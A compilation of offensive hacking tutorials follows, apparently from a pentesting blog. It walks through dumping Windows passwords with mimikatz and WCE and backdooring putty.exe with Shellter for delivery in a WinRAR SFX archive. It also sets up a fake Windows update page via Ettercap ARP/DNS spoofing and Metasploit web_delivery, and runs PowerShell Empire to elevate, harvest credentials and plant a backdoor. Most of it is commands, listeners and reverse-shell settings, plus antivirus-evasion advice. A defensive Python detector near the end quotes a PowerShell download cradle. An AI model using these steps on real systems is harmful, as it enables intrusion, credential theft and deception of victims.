Hack Windows Password in Clear Text using Mimikatz and Windows credential Editor

mimikatz is a tool to test Windows security. It is best known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket, or build Golden Tickets.


First, download the Windows build of mimikatz from here, then right-click it and run it as Administrator. Use the build that matches the OS architecture (x64 on 64-bit Windows); a 32-bit mimikatz cannot read LSASS memory on a 64-bit system.


The mimikatz console opens.


Type the following command to obtain the SeDebugPrivilege that mimikatz needs in order to open LSASS memory. It should answer Privilege '20' OK; it fails if the console is not running as Administrator.
privilege::debug


Now type the following command to dump the credentials of every logon session held in LSASS, including plaintext passwords where they are cached:
sekurlsa::logonPasswords

Note: on Windows 8.1 / Server 2012 R2 and later (and on older versions with KB2871997 installed) WDigest no longer keeps plaintext passwords in memory, so the wdigest block shows Password : (null) unless the registry value HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential was set to 1 before the user logged on. The NTLM hash in the msv block is still returned and can be used for pass-the-hash. On systems with Credential Guard enabled, LSASS secrets are isolated and sekurlsa cannot read them at all.


Windows Credential Editor

Windows Credentials Editor (WCE) is a security tool that lists Windows logon sessions and lets you add, change, list and delete the credentials associated with them (LM/NT hashes, Kerberos tickets and cleartext passwords).

First, download WCE from here.
Open a command prompt as Administrator, change into the WCE directory and run:
wce.exe -w
The -w switch dumps the cleartext passwords of the current logon sessions. It reads the same in-memory cache as mimikatz's wdigest output, so the WDigest caveat above applies: on current Windows versions it finds nothing unless plaintext caching has been re-enabled.

Hack Remote PC using WinRAR SFX Remote Code Execution Vulnerability

A remote code execution vulnerability was reported in the official WinRAR SFX v5.21 module. It allows a remote attacker to have arbitrary, system-specific code executed on the machine of a user who opens a crafted self-extracting archive.

The issue lies in the 'Text and Icon' function of the 'Text to display in SFX window' module: the text entered there is rendered as HTML when the archive is opened, so an attacker can build a self-extracting archive whose window loads a remote payload (for example through an iframe) and have it executed on the target. Note that an SFX archive is itself an executable, so the victim still has to open it; the walkthrough below combines it with a Shellter-backdoored binary served from Kali.

Download Shellter from here and use the latest release (at the time of writing the author reports that antivirus engines did not detect its output). After downloading, unzip the archive.


Change into the Shellter directory and run it under Wine: wine shellter.exe


A terminal opens; choose operation mode Auto (A).


Now choose an executable and copy it into the Shellter folder; Shellter injects the payload into that .exe.
Here I copied putty.exe as the file to inject the payload into.

Note: only PE executable files can be used as the target.


After the operation mode, it asks for the PE target: give the filename (putty.exe) and the injection process starts.


When prompted to enable stealth mode, enter Y.


Once the injection point is prepared, it asks which payload to use. Choose L for a listed payload, then 1 for Meterpreter_Reverse_TCP.

Give LHOST (the IP address of the Kali machine) and LPORT 4444; the handler below must use the same values.


After all options are set you get the confirmation Injection: Verified! Press Enter to continue.


The backdoored putty.exe is now in the Shellter directory.


Move putty.exe to /var/www/html.


Start Apache: service apache2 start


Now build the SFX archive in WinRAR. Right-click a file and select Add to archive.


Select the Create SFX archive option.


Go to the Advanced tab and click SFX options.


Select the Text and Icon tab and, in the text to display, enter an HTML iframe tag whose src points at the putty.exe you are hosting on Apache (http://<Kali IP>/putty.exe).
Click OK.


Send this SFX archive to the victim using any social engineering technique.


Now set up a listener to handle the reverse connection the victim's machine makes when the payload runs. The payload and LPORT must match what was chosen in Shellter:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.5
set lport 4444
exploit

When the victim opens the archive and runs the delivered putty.exe, the payload connects back and you get a Meterpreter session on the victim's PC.

Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit

First, open Ettercap's DNS spoofing table, /etc/ettercap/etter.dns, on Kali.

Add an A record that resolves the names you want to hijack to your own IP address. Each entry has the form <name> A <IP>; a bare * as the name answers every query with your address.


Now run Ettercap against the victim's IP address to ARP-poison it and answer its DNS queries (-T text interface, -q quiet, -P dns_spoof loads the plugin, -M arp enables ARP poisoning; the second target is left empty so the victim's traffic to every host, including the gateway, is poisoned). The target syntax below is MAC/IP/PORT as in Ettercap 0.7; Ettercap 0.8 adds an IPv6 field, so the spec becomes /192.168.0.103///.
ettercap -i eth0 -T -q -P dns_spoof -M arp /192.168.0.103//


This activates the dns_spoof plugin.


Open a terminal and type msfconsole to start Metasploit, then:

use exploit/multi/script/web_delivery
set lhost 192.168.0.125
set lport 4444
set target 2
set payload windows/meterpreter/reverse_tcp
exploit

(lhost is the IP of your Kali machine; target 2 is the PSH target, which makes web_delivery serve the payload from its own web server and print a powershell.exe one-liner that downloads and runs it.)


Copy the powershell.exe one-liner that web_delivery prints and save it as update.bat.


Now create a fake web page showing a Windows security update message, with a hyperlink to update.bat.


Save this page as index.html in /var/www/html.


Start the Apache server: service apache2 start


Because its DNS answers are spoofed, whichever website the victim opens, the fake Windows security update page is displayed instead.
When the victim clicks the download link, saves update.bat and runs it, the batch file executes the PowerShell one-liner, which fetches the payload from your machine.



You now have control of the victim's PC. Type sessions -l to list the sessions opened when the victim ran the file, then sessions -i <id> to interact with one.

Inside the session, type sysinfo to get system information, then shell to drop into the victim's command prompt.

Hacking with Empire - PowerShell Post-Exploitation Agent


This is the first post of our Empire series. It covers the basics you need to know about the PowerShell Empire framework; later posts will move on to its more advanced use.

Table of content:
·         Introduction
·         Installation
·         Importance
·         Terminology
·         Work Flow
·         Demo
·         Conclusion

Introduction

Empire is a post-exploitation framework. It pairs a pure PowerShell agent for Windows and a pure Python agent for Linux/macOS with a Python server, cryptographically secure communications and a flexible, modular architecture. Empire can run its PowerShell agent without powershell.exe, and it ships a large library of post-exploitation modules, ranging from keyloggers to mimikatz. The framework is the merger of the PowerShell Empire and Python EmPyre projects, which makes it user friendly and convenient: PowerShell Empire came out in 2015 and Python EmPyre in 2016. It is comparable to Metasploit and Meterpreter, but as a command-and-control tool it is built around managing many compromised machines at once, which lets you control a PC much more efficiently.

Importance

PowerShell offers many offensive advantages: full access to .NET and, through it, direct access to the Win32 API; a route around application whitelisting such as AppLocker, since it runs code without writing a new binary; and the ability to build and run malicious code in memory. Empire provides the C2 functionality on top of that: it lets you push a second stage after the first, can be used for lateral movement, and has matured quickly compared with other frameworks. Because the agent does not depend on powershell.exe, blocking or monitoring that binary alone does not stop it, which also helps it slip past antivirus that only watches powershell.exe. That is why PowerShell Empire is worth learning.

Terminology

Before starting, you need to know these four terms:

·         Listener: a process on the attacker's machine that waits for connections from the machines we are attacking. Agents report back through it, which is how Empire gets the loot to the attacker's computer.

·         Stager: a small snippet of code (a batch file, a one-liner, a macro, and so on) that, when run on the target host, downloads the agent and starts it.

·         Agent: the program that maintains the connection between your computer and the compromised host and runs the tasks you send it.

·         Module: the pieces of code the agent executes on request, such as the credential-harvesting and privilege-escalation modules mentioned above.



Installation

You can download Empire from here: clone the repository from the GitHub link provided, or simply search for it.

Use the following command to download it:



Once the download completes, follow the steps below to install it:

cd Empire
ls
cd setup
ls
./install.sh


Wait for the installation to complete; it takes a little while and prompts you for a server negotiation password.

In my case, my password was toor.

Once the installation is done, move back up one directory and run Empire with ./empire.
Now use the help command: it lists all the essential options you need to begin.


Following the workflow, we first have to create a listener on our local machine. Type the following command:

listeners

It will say "no listeners are currently active", but don't worry, we are now in the listeners menu. In this menu, type:

uselistener


The above command lists all the listener types available, such as dbx, http, http_com, etc. The most popular and commonly used listener is http, and we will use it in our practical. For that, type:

uselistener http

This creates an http listener that binds port 80 by default. If port 80 is already in use by a service such as Apache, either stop that service or give the listener another port with set Port (and include that port in the Host URL below). Now, to see all the settings this listener takes, type:

info

As you can see in the image, there are a variety of settings you can use to customise your listener. Let's change the listener's name first; it helps to keep track of listeners when several are running. For this, type:

set Name test

The above command changes the listener's name from http to test.

The listener usually picks up the local host IP automatically, but just in case, you can set it explicitly (use http://IP:port if you changed the port):

set Host http://192.168.1.107

execute

The execute command starts the listener. Then go back and run listeners to see it listed, as shown in the image.



Now type back to leave the listener menu so that we can choose a stager. Use the following command to see all the stagers Empire provides:

usestager

As you can see in the image below, there are stagers for both Windows and macOS (osx), along with some multi-platform ones that work on any platform. We will use launcher_bat to create the malicious file and compromise our victim's PC in this practical. For that, type:

usestager windows/launcher_bat

Then type info again to see all the settings the stager requires. You will see that we only need to provide the listener. Therefore, type:

set Listener test
execute


The above two commands point the stager at the listener test and generate it as /tmp/launcher.bat. Serve that file (the python HTTP server run from /tmp is enough) and get the victim to run it; the batch file launches PowerShell with an encoded command that downloads the agent from the listener, and an agent checks in. To check your session, type:

agents

The above command shows that you have an agent checked in. You can rename it, as the default name is pretty complicated and hard to remember. To do so, type:

rename ZAF3GT5W raajpc

Use the following to access the session:

interact raajpc
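Both the web_delivery one-liner saved as update.bat in the previous article and the launcher.bat generated above reach the target as a PowerShell command line: the first an IEX download cradle run with -nop -w hidden, the second powershell -noP -sta -w 1 -enc followed by a base64-encoded (UTF-16LE) command. The following Python script is an added example from the editor, not part of Empire or Metasploit: it decodes -EncodedCommand arguments and flags these launcher shapes in process command lines, which is what a defender hunting for the sessions above would look for. The sample command lines are constructed to match those shapes; the encoded body is a placeholder rather than Empire's real stager, and the IP addresses are the ones used in these walkthroughs.

```python
"""Flag PowerShell download cradles and encoded launchers in process command lines.

Editor-added example; not code from this guide, Metasploit or Empire. SAMPLE_CMDLINES
are constructed: the first follows the shape of the one-liner web_delivery prints, the
second the shape of Empire's launcher.bat (powershell -noP -sta -w 1 -enc ...) with a
placeholder body in place of the real stager; the last two are benign controls.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the value is base64 of the UTF-16LE command text.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+(?:hidden|1)\b"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "web_download": re.compile(r"(?i)net\.webclient|downloadstring|downloadfile"),
}


@dataclass
class Finding:
    cmdline: str
    decoded: Optional[str] = None                  # plaintext of -EncodedCommand, if any
    indicators: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # IEX over a web download is the cradle both tools rely on; an encoded command
        # that also hides its window is the launcher.bat shape.
        cradle = "invoke_expression" in self.indicators and "web_download" in self.indicators
        hidden_encoded = "encoded_command" in self.indicators and "hidden_window" in self.indicators
        return cradle or hidden_encoded


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or not valid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> Finding:
    finding = Finding(cmdline=cmdline, decoded=decode_encoded_command(cmdline))
    if finding.decoded is not None:
        finding.indicators.append("encoded_command")
    # Match against the decoded text too: with -enc the cradle keywords are not in the raw line.
    haystack = cmdline + "\n" + (finding.decoded or "")
    finding.indicators.extend(name for name, pat in INDICATORS.items() if pat.search(haystack))
    return finding


def scan(cmdlines: List[str]) -> List[Finding]:
    return [analyze(c) for c in cmdlines]


def _encode(ps: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (used for constructed input)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Placeholder body for the constructed Empire-style line; not Empire's real stager.
PLACEHOLDER_STAGER = "$wc=New-Object Net.WebClient;IEX $wc.DownloadString('http://192.168.1.107/')"

SAMPLE_CMDLINES = [  # constructed sample process command lines
    "powershell.exe -nop -w hidden -c $K=new-object net.webclient;"
    "IEX $K.downloadstring('http://192.168.0.125:8080/abc');",
    "powershell -noP -sta -w 1 -enc " + _encode(PLACEHOLDER_STAGER),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1",
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\raj\\notes.txt",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print("SUSPICIOUS" if f.suspicious else "ok        ", sorted(f.indicators), f.cmdline[:60])
        if f.decoded:
            print("    decoded:", f.decoded)
```

In practice, feed it the CommandLine field of Sysmon event ID 1 or Windows 4688 events. Checking the decoded command as well as the raw one matters: with -enc the cradle keywords never appear in the process command line itself, so a plain string match would miss the launcher.bat case entirely.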

Once you have access to the agent, try to obtain an elevated (high-integrity) agent with the following command. Its argument is the name of the listener the new agent should call back to, so use the name set above. This only works when the user is a local administrator running under UAC; a standard user cannot be elevated this way.

bypassuac test

After the bypassuac command completes, another agent checks in. Rename that one too by typing:

rename HE3K45LN adminraj


Let's interact with adminraj now.

interact adminraj

The help command shows all the options available in the agent menu. Several are quite useful for post-exploitation, such as info, jobs, list, etc., as shown in the image.
info: all the basic details of the agent, such as IP, nonce, jitter, integrity, etc.


Using the help command, you can see all the executable commands.


Let's run mimikatz to get the user's password:

mimikatz

mimikatz needs an elevated (high-integrity) agent; it will not work from the medium-integrity agent we had first, which is why we had to obtain admin access before using it.

Hmmmm!! And the password is "123" for user raj.


creds
The above command dumps the credentials Empire has collected so far, both plaintext passwords and hashes.
Another important command is shell.
It runs a proper Windows command in the victim's cmd.exe.
E.g. one such cmd-only command is netstat:

shell netstat -ano

As expected, the above command shows every port currently in use on the machine, along with the owning process ID.


Now, since the default working directory of the shell is C:\Windows\System32, let's move into another directory, download a file from there, and upload something to that location, for example a backdoor. Use the following commands:

shell cd C:\Users\raj\Desktop
shell dir
download 6.png

The above command downloads an image called 6.png from the victim's desktop to Empire's downloads directory.
upload /root/Desktop/revshell.php

Here we can upload any backdoor; with the above command we upload a PHP backdoor from Kali's desktop to the victim's desktop, and since we have shell access we can also launch whatever we upload (a .php file needs an interpreter on the target; an .exe or .bat can be run directly).


This is where the downloaded files go, in the downloads directory under the Empire install, with a subdirectory per agent:
Empire directory/downloads//


shell dir
The above command confirms that we have indeed uploaded revshell.php.
And there it is: revshell.php, our backdoor file, on the desktop of the victim's machine.


That was the basic demo of Empire, its terminology and how to use it. There is one more command to cover, usemodule. Lastly, let's see how to use it.

usemodule

The command shows all the modules available and ready to use, as shown in the image below:

The following is a small demo of usemodule. Type:

usemodule trollsploit/message
set MsgText you have been hacked
execute
y


Running the above module displays a message box on the victim's PC, as shown in the image below:

Conclusion

Malware in the form of .exe/.dll/.hta etc. lets an attacker build any attack they want, since this framework has access to Win32. Although antivirus vendors are catching up day by day, these techniques are still effective. Empire is a great tool thanks to its vast, well-built and efficient collection of post-exploitation modules. Ultimately, the goal is to stay undetected and succeed in your attack, and this tool allows you to do so. This article covered all the basics you need to know about the framework.

Happy Hacking!!